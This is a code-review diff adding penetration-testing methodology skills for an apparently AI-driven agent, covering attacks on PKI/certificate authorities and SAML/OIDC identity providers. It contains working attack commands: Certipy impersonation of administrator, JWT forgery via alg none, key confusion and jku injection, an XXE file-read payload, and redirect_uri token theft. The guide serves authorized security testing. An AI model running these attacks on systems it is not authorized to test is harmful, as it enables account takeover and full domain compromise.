+- Missing `state` (login CSRF) + account linking → silently bind victim sessions to an attacker IdP identity → persistent access.
+- PKCE downgrade + code leak → ATO even on a "secure" public client.
+- SSRF in `jku`/`x5u`/`request_uri` fetch (provider pulls attacker-hosted JWKS/request object) → sign tokens the server trusts → **token minting** (hand off to the SSRF and JWT skills).
+- Refresh token without rotation/revocation → durable access surviving password reset and logout.
+- Stolen ID token with org claims → privilege escalation across every relying party that trusts this IdP (SSO blast radius is org-wide).
+
+## Pro Tips
+
+1. The discovery document (`/.well-known/openid-configuration`) is your map — diff `response_types_supported`, `grant_types_supported`, and `code_challenge_methods_supported` against what the server *actually* accepts; advertised constraints are often not enforced.
+2. Always test `redirect_uri` mutation one variant per request and watch for a `302` that still carries `code=`/`access_token=` to a non-canonical host — that single response is the whole bug.
+3. Prefer attacking the *relying party's* `redirect_uri` handling and account-linking logic; well-known IdPs (Google/Okta/Auth0) are usually hardened, but client integrations are sloppy.
+4. Fragment (`#`) params don't reach the server but do reach client JS and leak via Referer — for implicit/hybrid flows, route the leak through an open redirect or a third-party script sink.
+5. Try `prompt=none` to test silent re-auth and whether scopes are granted without consent UI.
+6. Test logout/`end_session` honestly: confirm the refresh token is dead afterward — many providers kill the cookie but keep refresh tokens alive.
+7. When you control any subdomain of the target, re-check wildcard `redirect_uri` registrations — that turns a "low" config note into ATO.
+8. Correlate OAST hits to a specific request by restarting `interactsh-client` between payloads; embed the per-test domain inside `redirect_uri`, `request_uri`, or a `jku` to attribute the egress to the server, not your browser.

--- a/strix/skills/identity/pki_ca.md
+++ b/strix/skills/identity/pki_ca.md
@@ -1,0 +1,148 @@
+---
+name: pki_ca
+description: Assess Certificate Authority / PKI assets for weak issuance controls, broken chain validation, and exposed signing keys.
+---
+
+# Certificate Authority / PKI
+
+A Certificate Authority and its surrounding PKI (issuing CAs, RA/enrollment front-ends, OCSP/CRL responders, ACME/SCEP/EST endpoints, key stores, and the certificates themselves) is a root of trust: anything that can coerce it to issue, or that can forge a chain it accepts, mints credentials the rest of the estate trusts implicitly. The attacker objective here is to obtain or impersonate a trusted identity — by getting a cert issued for a name you do not control, by exploiting a verifier that accepts an attacker-built chain, or by recovering signing key material — then pivot to TLS interception, auth bypass (mTLS/SSO), code signing, or domain-wide impersonation. Treat the CA as identity-issuing infrastructure, not "just a web server."
+
+## Attack Surface
+
+**Issuance / enrollment endpoints**
+- ACME directory (`/acme/directory`, `/.well-known/acme/`), Let's Encrypt-style validators
+- SCEP (`/scep`, `/certsrv/mscep/`), EST (`/.well-known/est/cacerts`, `/simpleenroll`), CMP
+- AD CS web enrollment (`/certsrv/`), CES/CEP (`/ADPolicyProvider_CEP_*`, `/*_CES_*`), NDES
+- Vault PKI (`/v1/pki/issue/<role>`, `/v1/pki/sign/<role>`), step-ca, smallstep, cfssl, EJBCA RA
+
+**Validation / revocation surface**
+- OCSP responders (`/ocsp`), CRL distribution points (URLs in cert CRLDP), AIA (CA issuer URLs)
+- Any service that validates client certs (mTLS gateways, SSO/IdP, VPN, MQTT, gRPC)
+
+**Key & config exposure**
+- Private keys, PKCS#12/`.pfx`/`.jks`, CA DB, HSM/PKCS#11 config, KMS/Key Vault references
+- Cert templates / issuance policies / role definitions (where SANs, EKU, name constraints live)
+
+**The certificates themselves** — public CT logs, TLS handshakes, leaked bundles in repos/images.
+
+## Recon & Enumeration
+
+```bash
+# Subdomains + live PKI hosts
+subfinder -d target.tld -silent | httpx -silent -title -tech-detect -o hosts.txt
+naabu -host target.tld -p 80,443,8443,9000,9443,8200 -silent | httpx -silent
+
+# Inspect the served leaf + full chain, EKU, SANs, key size, sig alg
+echo | openssl s_client -connect target.tld:443 -servername target.tld -showcerts 2>/dev/null \
+  | openssl x509 -noout -text -fingerprint -sha256
+nmap --script ssl-cert,ssl-enum-ciphers,ssl-known-key -p 443,8443 target.tld
+
+# Certificate Transparency: harvest every name the CA has issued for the org
+curl -s "https://crt.sh/?q=%25.target.tld&output=json" | jq -r '.[].name_value' | sort -u
+
+# Discover enrollment / responder paths
+ffuf -u https://target.tld/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt \
+  -mc 200,301,302,401,403 -fs 0
+katana -u https://target.tld -jc -silent | grep -Ei 'acme|scep|est|ocsp|certsrv|/pki/|crl'
+curl -s https://target.tld/acme/directory | jq .            # ACME capabilities
+curl -s https://target.tld/.well-known/est/cacerts | openssl pkcs7 -inform DER -print_certs -noout
+
+# Nuclei templates for PKI/TLS/CA misconfig (templates already in sandbox)
+nuclei -u https://target.tld -tags ssl,tls,exposure, acme,vault -s critical,high,medium -silent -j -o pki.jsonl
+nuclei -l hosts.txt -t ssl/ -t http/exposures/ -rl 30 -c 10 -bs 10 -j -o pki_ssl.jsonl
+
+# Hunt leaked keys/PFX/bundles in source, history, and images
+trufflehog filesystem ./repo --only-verified
+gitleaks detect -s ./repo --no-banner
+trivy image registry.target.tld/app:latest --scanners secret,misconfig
+semgrep --config p/secrets ./repo
+
+# Active Directory Certificate Services (install Certipy)
+pipx install certipy-ad
+certipy find -u user@target.tld -p 'Passw0rd' -dc-ip 10.0.0.10 -vulnerable -stdout
+# LDAP read of pKICertificateTemplate objects if you have creds
+ldapsearch -x -H ldap://10.0.0.10 -D 'user@target.tld' -w 'Passw0rd' \
+  -b 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=target,DC=tld'
+```
+
+## Methodology
+
+1. **Map the trust hierarchy.** Pull the served chain and CT data; identify root, intermediates, issuing CAs, and which services *trust* this CA (mTLS gateways, IdP, package/code signing). The verifiers are often the real target.
+2. **Enumerate issuance entry points.** ACME, SCEP/EST/CMP, AD CS web enrollment, Vault/step-ca roles. For each, determine: who can request, what identity validation runs, and which fields (SAN, EKU, CN, validity, CA:TRUE) the requester influences.
+3. **Test issuance controls.** Attempt to obtain a certificate for a name/identity you do not legitimately control (see Key Weaknesses). Start with low-impact names you *can* prove control of to learn the flow, then probe authorization gaps.
+4. **Test chain validation on the verifiers.** Feed each cert-consuming service crafted chains: wrong EKU, expired/revoked leaf, self-signed, mismatched SAN, name-constraint violations, and ALG=none-style downgrades.
+5. **Test revocation.** Confirm OCSP/CRL are actually checked and fail *closed*. A revoked-but-accepted cert is a finding.
+6. **Hunt key material.** Grep repos, CI, backups, container images, and config endpoints for private keys, PKCS#12, and HSM/KMS misconfigs that allow signing-key use or export.
+7. **Validate and chain.** Convert any accepted forged identity into concrete impact (mTLS bypass, TLS MITM, signed artifact) with a minimal PoC, then stop.
+
+## Key Weaknesses / Techniques
+
+**Weak / missing domain validation in ACME or RA.** If the validator checks `http://host/.well-known/acme-challenge/<token>` but the host is attacker-influenceable (shared hosting, dangling subdomain, SSRF-reachable internal validator, or a request-routing/host-header confusion), you can satisfy validation for a name you do not own.
+```bash
+certbot certonly --manual --preferred-challenges http -d victim-subdomain.target.tld \
+  --server https://target.tld/acme/directory --register-unsafely-without-email
+```
+Verify whether DNS-01 falls back to a wildcard-trusting resolver, and whether CAA records are enforced at issuance.
+
+**Over-permissive issuance roles / templates (SAN injection).** Roles that let the requester set arbitrary SANs or `subjectAltName` extensions, or templates with `ENROLLEE_SUPPLIES_SUBJECT`, let you mint a cert for any identity.
+```bash
+# Vault PKI role that allows any domain / any SAN
+vault write pki/issue/web common_name="admin@target.tld" \
+  alt_names="sso.target.tld" ip_sans="10.0.0.10"
+```
+
+**AD CS escalation (ESC1–ESC8).** Templates allowing requester-supplied SAN + client-auth EKU + low enrollment rights = domain account impersonation. Validate with Certipy:
+```bash
+certipy req -u user@target.tld -p 'Passw0rd' -dc-ip 10.0.0.10 \
+  -ca 'target-CA' -template VulnTemplate -upn administrator@target.tld
+certipy auth -pfx administrator.pfx -dc-ip 10.0.0.10
+```
+ESC8 = NTLM relay to the web-enrollment endpoint (`/certsrv/certfnsh.asp`) — relay a machine account to obtain a DC cert.
+
+**Broken chain validation on verifiers.** Common verifier bugs to assess:
+- Accepts any cert signed by *a* trusted CA regardless of EKU (TLS-server cert reused for client auth).
+- Validates the leaf signature but not the full path to a trusted root, or ignores `pathLenConstraint`/`CA:TRUE` so an intermediate can sign anything.
+- Honors a leaf's SAN without confirming the issuing CA is constrained to that namespace (missing `nameConstraints`).
+- Pins/compares the *Subject DN* string instead of cryptographic identity → spoofable.
+
+**Revocation not enforced.** Service ignores OCSP/CRL, or "soft-fails" when the responder is unreachable → revoked/stolen certs keep working. Confirm AIA/CRLDP are reachable and checked.
+
+**Weak crypto / predictable serials.** MD5/SHA-1 signatures, RSA-1024, Debian-weak keys, or sequential serials enabling collision/forgery. `nmap --script ssl-known-key` flags known-compromised keys.
+
+**Exposed signing keys.** `.pfx`/`.jks`/`*.key` in repos, S3, or images; brittle passphrases crackable with `pfx2john`/`john`. Possession of an intermediate or root key = full forgery.
+
+## Validation
+
+1. **Forged identity, demonstrably trusted.** Show a cert you obtained/crafted for a name you do not control, *and* show a real verifier accepting it (e.g. `curl --cert forged.pem --key forged.key https://mtls.target.tld/whoami` returns the impersonated principal). Trust by one client without a consuming service is weaker evidence.
+2. **Issuance authorization gap.** Capture the full enrollment request/response proving the CA issued without adequate identity proof; include the issued cert's SAN/EKU and the requesting principal's (lack of) rights.
+3. **Revocation bypass.** Revoke a test cert (or use a known-revoked one), then show the verifier still accepts it; capture the OCSP/CRL response (or its absence) at the time.
+4. **Key recovery.** Prove the recovered key matches the CA/leaf by signing a fresh CSR or matching modulus: `openssl x509 -noout -modulus -in cert.pem | openssl md5` vs `openssl rsa -noout -modulus -in found.key | openssl md5`.
+
+## False Positives
+
+- A cert with a scary-looking SAN that no production verifier actually trusts (only in a private test store) — not exploitable.
+- crt.sh entries for names the org legitimately owns or for pre-cert/CT-test entries; confirm the name is out of the requester's authority before claiming SAN abuse.
+- "Self-signed cert accepted" by a client you configured to skip verification (`-k`, `verify=False`) — the misconfig is yours, not the asset's.
+- OCSP soft-fail that is the documented, accepted design with a compensating short-lived-cert policy.
+- AD CS templates flagged by `certipy find` as vulnerable but with enrollment ACLs that exclude all reachable principals — verify you can actually enroll.
+- Expired cert served on a host that is decommissioned/out of scope.
+
+## Chaining & Impact
+
+- Forged client cert → mTLS/SSO bypass → authenticated access as any user/service → app-level RCE or data access.
+- AD CS ESC1/ESC8 → certificate for `administrator`/DC machine → Kerberos PKINIT → Domain Admin / DCSync → full domain compromise.
+- Issuance of a valid TLS leaf for a victim domain → on-path TLS interception (combine with DNS/ARP/routing control) → credential and session theft.
+- Recovered intermediate/root key → forge unlimited trusted certs and code-signing certs → supply-chain / update-channel compromise.
+- Over-permissive Vault PKI role → mint service identities → lateral movement across a service mesh that trusts the CA.
+
+## Pro Tips
+
+1. The CA is rarely the prize — the *verifiers* are. Enumerate everything that trusts this CA before you spend effort forging; an unconsumed cert is just bytes.
+2. Always inspect EKU and `nameConstraints`. A TLS-server CA with no EKU restriction and no name constraints is a forgery factory; many verifiers don't recheck EKU.
+3. On Windows estates, run `certipy find -vulnerable` early — ESC1/ESC8 are extremely common and convert directly to Domain Admin.
+4. Test revocation by *unplugging* the responder: block OCSP/CRL egress and see if validation soft-fails open. Soft-fail is the rule, not the exception.
+5. CT logs (crt.sh) are free recon for issuance scope, internal hostnames, and short-lived/automation certs that reveal the issuance pipeline.
+6. Diff how different clients build/verify chains (OpenSSL vs Go vs Java vs browsers) — path-building and constraint enforcement differ, and the weakest verifier defines exploitability.
+7. Check serial-number entropy and signature algorithm on every issued cert; predictable serials + weak hash is a (rare but real) forgery path.
+8. For ACME/SCEP, probe whether validation runs from an internal resolver/fetcher you can influence — host-header, dangling DNS, and SSRF turn DV into a free identity.
+9. Match recovered keys to certs by modulus hash before claiming key compromise; a stray `.key` may belong to a dev/self-signed cert, not the CA.

--- a/strix/skills/identity/saml_oidc_idp.md
+++ b/strix/skills/identity/saml_oidc_idp.md
@@ -1,0 +1,146 @@
+---
+name: saml_oidc_idp
+description: Authorized testing of SAML/OIDC identity providers — signature, audience, replay, and assertion/token tampering.
+---
+
+# SAML / OIDC Identity Provider
+
+A SAML or OIDC identity provider (IdP) is the authentication authority that issues signed assertions (SAML) or signed tokens (OIDC/OAuth2) which downstream service providers (SPs / relying parties) trust to grant access. The attacker's objective is to forge, replay, or tamper with these proofs so the IdP or a trusting SP accepts an identity that was never legitimately authenticated — yielding account takeover, privilege escalation, or full federation compromise. Because every relying party trusts the IdP, a single signature-validation flaw can cascade across an entire organization.
+
+## Attack Surface
+
+**SAML endpoints**
+- IdP SSO endpoint (`/saml2/idp/SSOService.php`, `/adfs/ls/`, `/sso/saml`), SLO endpoint, ACS (Assertion Consumer Service) on the SP side.
+- Metadata: `/saml/metadata`, `/FederationMetadata/2007-06/FederationMetadata.xml`, `/simplesaml/saml2/idp/metadata.php` — exposes signing certs, endpoints, NameID format.
+- `SAMLRequest` / `SAMLResponse` / `RelayState` params (HTTP-Redirect = deflated+base64+URL-encoded; HTTP-POST = base64 form field).
+
+**OIDC / OAuth2 endpoints**
+- Discovery: `/.well-known/openid-configuration`, JWKS at `jwks_uri`.
+- `/authorize`, `/token`, `/userinfo`, `/introspect`, `/revoke`, dynamic client registration `/register`.
+- ID tokens (JWT) and access tokens; `redirect_uri`, `state`, `nonce`, `code`, `code_challenge` (PKCE), `response_type`, `scope`, `prompt`.
+
+**What is exposed**
+- Public signing keys/certs (verify, never trust as authz boundary), supported algorithms, NameID/claim formats, registered SPs/clients, and any self-service registration.
+
+## Recon & Enumeration
+
+```bash
+# Live host / TLS / tech fingerprint
+naabu -host idp.target.tld -p 443,8443,80,8080 -silent | httpx -title -tech-detect -tls-probe -status-code
+wafw00f https://idp.target.tld
+
+# OIDC discovery + JWKS (the single richest recon artifact)
+curl -s https://idp.target.tld/.well-known/openid-configuration | jq .
+curl -s "$(curl -s https://idp.target.tld/.well-known/openid-configuration | jq -r .jwks_uri)" | jq .
+
+# SAML metadata
+curl -s https://idp.target.tld/FederationMetadata/2007-06/FederationMetadata.xml -o md.xml
+curl -s https://idp.target.tld/simplesaml/saml2/idp/metadata.php -o md.xml
+xmllint --format md.xml | grep -iE "X509Certificate|SingleSignOn|NameIDFormat|WantAuthnRequestsSigned"
+
+# Subdomains / federation siblings (adfs, sts, login, sso, idp, auth)
+subfinder -d target.tld -silent | httpx -silent -match-string "openid-configuration|saml|wsfed"
+dnsx -d target.tld -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -silent
+
+# Endpoint / path discovery
+ffuf -u https://idp.target.tld/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,302,401,403
+katana -u https://idp.target.tld -d 3 -jc -silent
+
+# Known IdP CVEs & misconfig (Keycloak, ADFS, SimpleSAMLphp, Shibboleth, OneLogin, Okta)
+nuclei -u https://idp.target.tld -tags saml,oauth,oidc,keycloak,adfs,jwt -s critical,high,medium -silent -j -o idp_nuclei.jsonl
+
+# JWT / token tooling (preinstalled; else: pip install jwt_tool  OR  git clone https://github.com/ticarpi/jwt_tool)
+jwt_tool <ID_TOKEN>                 # decode + claim audit
+jwt_tool <ID_TOKEN> -t https://idp.target.tld/.well-known/openid-configuration  # auto JWKS pull
+
+# SAML manipulation (Burp + SAML Raider extension) or python:
+pip install python3-saml lxml signxml      # for crafting/re-signing assertions
+# decode a SAMLResponse param quickly:
+python3 -c "import sys,base64,urllib.parse,zlib;print(base64.b64decode(urllib.parse.unquote(sys.argv[1])).decode())" "$SAMLRESPONSE"
+
+# Leaked signing keys / secrets in repos and artifacts
+trufflehog filesystem ./idp-config --only-verified
+gitleaks detect --source ./idp-config
+semgrep --config p/jwt --config p/secrets ./idp-config
+```
+
+## Methodology
+
+1. **Map the protocol(s).** Confirm SAML, OIDC, or WS-Fed. Pull metadata/discovery and the JWKS/X509 signing certs. Note advertised algorithms (`RS256`, `HS256`, `none`, `ES256`) and `NameIDFormat`/claim shapes.
+2. **Capture a legitimate flow.** Proxy a real login through Burp end to end. Save a valid `SAMLResponse`/`Assertion` or ID token/access token as the baseline for tampering.
+3. **Audit signature validation.** This is the core test — see Key Weaknesses. Try unsigned, stripped-signature, wrong-key, and algorithm-confusion variants and observe whether the SP/IdP still accepts the identity.
+4. **Tamper claims/attributes.** Modify `NameID`, `email`, `groups`/`roles`, `sub`, `aud`, `iss` and re-submit; check if authz is derived from attacker-controlled fields.
+5. **Test temporal & replay controls.** Replay a previously consumed assertion/token; modify/remove `NotOnOrAfter`, `exp`, `iat`, `nonce`, `jti`.
+6. **Test redirect/relay handling.** Probe `redirect_uri`, `RelayState`, `wreply` for open redirect and token exfiltration.
+7. **Test the OAuth2 surface.** Code interception, PKCE downgrade, `state`/`nonce` absence (CSRF), implicit-flow leakage, client-secret exposure, scope/consent bypass.
+8. **Chain to impact.** Convert a forged identity into SP account takeover, admin role injection, or cross-tenant access.
+
+## Key Weaknesses / Techniques
+
+### SAML signature flaws
+- **No signature validation / signature stripping.** Remove `<ds:Signature>` entirely (or the assertion-level one) and resubmit. Many SPs verify only if a signature is present.
+- **XML Signature Wrapping (XSW).** Inject a second forged `<Assertion>` while keeping the original signed one so the signature verifies against the legit assertion but the processor reads the forged one. Use Burp **SAML Raider** XSW templates 1–8, or craft manually by relocating the signed element and adding an attacker assertion with an attacker `NameID`.
+- **Comment injection in NameID.** `admin@target.tld` vs `admin@target.tld<!---->.evil.tld` — XML canonicalizers may strip comments differently from the text extractor, letting you impersonate `admin@target.tld`.
+- **Certificate / key confusion.** Resign the assertion with your own key and supply your own `<X509Certificate>` inline; vulnerable SPs trust the embedded cert instead of pinned metadata.
+- **XXE in the SAML parser.** Inject `<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>` into the unsigned envelope; if reflected/erroring, escalate to SSRF/file read (use `interactsh-client` for blind OOB).
+
+```bash
+# Re-sign a tampered assertion with python3-saml/signxml after editing NameID/attributes,
+# then base64+URL-encode and replay to the ACS. Decode/edit baseline first:
+python3 -c "import base64;open('assn.xml','wb').write(base64.b64decode(open('resp.b64').read()))"
+xmllint --format assn.xml        # edit NameID/Attribute, then re-encode and POST to ACS
+```
+
+### OIDC / JWT flaws
+- **`alg: none`.** Strip the signature and set header `{"alg":"none"}`: `jwt_tool <token> -X a`.
+- **HS256/RS256 confusion.** Re-sign an RS256 token with HS256 using the public key as the HMAC secret: `jwt_tool <token> -X k -pk pubkey.pem`. Works when the verifier keys off the token's own `alg`.
+- **JWKS injection (`jku`/`x5u`/`jwk`).** Point header `jku`/`x5u` to an attacker-hosted key set, or embed a `jwk`, and sign with your matching private key: `jwt_tool <token> -X i` / `-X s`. Validate any host allowlist on `jku`.
+- **`kid` injection.** SQLi/path-traversal/command-injection via the `kid` header to load an attacker-known key (e.g. `kid` -> `../../dev/null`, empty key).
+- **Audience / issuer confusion.** Replay a token minted for client A at client B's relying party when `aud`/`azp` isn't strictly checked; cross-tenant when `iss` is loosely matched.
+- **Claim tampering.** Flip `email_verified`, escalate `groups`/`roles`/`scope`, change `sub` — confirm whether the verified signature actually covers the field driving authz.
+
+### OAuth2 flow flaws
+- **`redirect_uri` validation.** Test substring/prefix matches, path append (`/callback/../evil`), `@` host confusion, open-redirect chaining, and `localhost`/wildcard registration to exfiltrate `code`/token.
+- **Missing `state` -> login CSRF; missing/ignored `nonce` -> ID-token replay.**
+- **PKCE downgrade.** Omit `code_challenge` or send `code_challenge_method=plain` and check enforcement; replay authorization `code` (should be single-use).
+- **Dynamic client registration abuse.** If `/register` is open, register a client with an attacker `redirect_uri` or request privileged scopes.
+
+## Validation
+
+- **SAML forgery proof:** submit the tampered/XSW/unsigned assertion to the ACS and demonstrate an authenticated session as a different (or higher-privileged) principal — capture the resulting session cookie and an authenticated page. Compare against the rejected control (e.g. random-byte signature) to prove validation is actually bypassed, not absent.
+- **JWT forgery proof:** present the forged token to `/userinfo` or a protected SP API and show a 200 with the impersonated `sub`/claims; show the same token with a flipped signature is rejected to confirm the server trusted your forgery.
+- **Replay proof:** consume an assertion/token once, then resend the identical artifact and show it is accepted a second time (or after `NotOnOrAfter`/`exp`).
+- **Redirect/leak proof:** drive a full auth request whose `code`/token lands on an attacker-controlled `redirect_uri` (use an `interactsh-client` URL to capture the inbound request).
+- Always keep a clean control request to distinguish a real bypass from an endpoint that accepts everything (or nothing).
+
+## False Positives
+
+- Decoding/modifying a token client-side without the SP accepting it — tampering is only a finding when the **server** honors it.
+- `alg:none` "accepted" by a permissive decoder library in your test harness, not by the target's verifier.
+- Metadata/JWKS/cert exposure: public signing keys are meant to be public; not a vuln unless a **private** key or shared secret leaks.
+- XSW that the SP rejects (proper schema validation + signed-element reference resolution).
+- Expired/short-lived tokens that "work" only inside the legitimate validity window — that is correct behavior, not replay.
+- `redirect_uri` reflections that never actually deliver a `code`/token to the foreign host.
+- Self-signed cert / TLS warnings on an internal IdP that are accepted policy.
+
+## Chaining & Impact
+
+- Signature bypass / XSW -> forge `NameID=admin` -> **SP admin account takeover**, then pivot into every app federated to that IdP.
+- JWT `alg`/`jku` confusion -> mint arbitrary ID tokens -> **full IdP impersonation** across all relying parties.
+- Group/role/scope claim injection -> **privilege escalation** inside the SP (e.g. `groups: ["Domain Admins"]`).
+- `aud`/`iss` confusion -> **cross-tenant / cross-application** access in multi-tenant IdPs (Keycloak realms, Azure AD app registrations).
+- Open `redirect_uri` + implicit/code leak -> **token theft** -> chained to the above forgeries.
+- SAML XXE -> SSRF -> cloud metadata creds (chain into the SSRF playbook) -> infrastructure compromise.
+- Leaked IdP signing key (trufflehog/gitleaks) -> offline forgery of any assertion/token -> persistent, undetectable impersonation.
+
+## Pro Tips
+
+1. Always compare against a control with a deliberately broken signature — an endpoint that accepts both your forgery and pure garbage is broken differently (no validation) than one that accepts only the forgery (validation logic flaw); both matter but the PoC framing differs.
+2. SAML signatures can sit at message level, assertion level, or both — strip/wrap each independently; SPs frequently validate one and read the other.
+3. For HS256/RS256 confusion, the exact PEM matters: try the cert with and without headers, with trailing newline variants — verifiers are picky and a false negative hides a real bug.
+4. Deflated SAML (HTTP-Redirect binding) is raw-deflate, not zlib — use `zlib.decompress(data, -15)` or you will get garbage and assume the endpoint is broken.
+5. `email_verified=false` is the silent killer: many SPs match accounts on `email` but forget to require it be verified, enabling pre-account-takeover via attacker-controlled OIDC claims.
+6. Check whether `jku`/`x5u` allowlisting is host-exact or substring — `https://idp.target.tld.evil.tld/jwks` defeats naive prefix checks.
+7. Test SLO/logout for assertion injection too; it is the same parser with weaker scrutiny.
+8. Keycloak/ADFS/SimpleSAMLphp versions in metadata/headers map directly to public CVEs — fingerprint precisely before crafting, and run the matching `nuclei` tags first.
+9. Use a fresh `interactsh-client` domain per payload for `jku`/redirect/XXE OOB so you can attribute each callback to a specific request.


### PR DESCRIPTION
## What

Adds deep per-asset methodology **skills** for Identity/auth asset types (OAuth/SSO, SAML/OIDC IdP, LDAP/AD, FIDO2, PKI/CA).

Part of the asset-coverage effort (foundation in #533, which adds the asset taxonomy + detection + recommended-skill hooks). These files provide the deep methodology each asset type's recommendation points at.

## Skills added

- `strix/skills/identity/fido2_webauthn.md`
- `strix/skills/identity/ldap_active_directory.md`
- `strix/skills/identity/oauth_sso.md`
- `strix/skills/identity/pki_ca.md`
- `strix/skills/identity/saml_oidc_idp.md`

## Notes

- Markdown only; no code changes. Auto-discovered by the skills loader (`get_available_skills` / `load_skills`), so they appear in `available_skills` and are loadable via `load_skill` or `create_agent(skills=[...])`.
- Each follows the house template/tone (cf. `vulnerabilities/ssrf.md`).
- No filename overlap with #532 (complementary asset coverage).
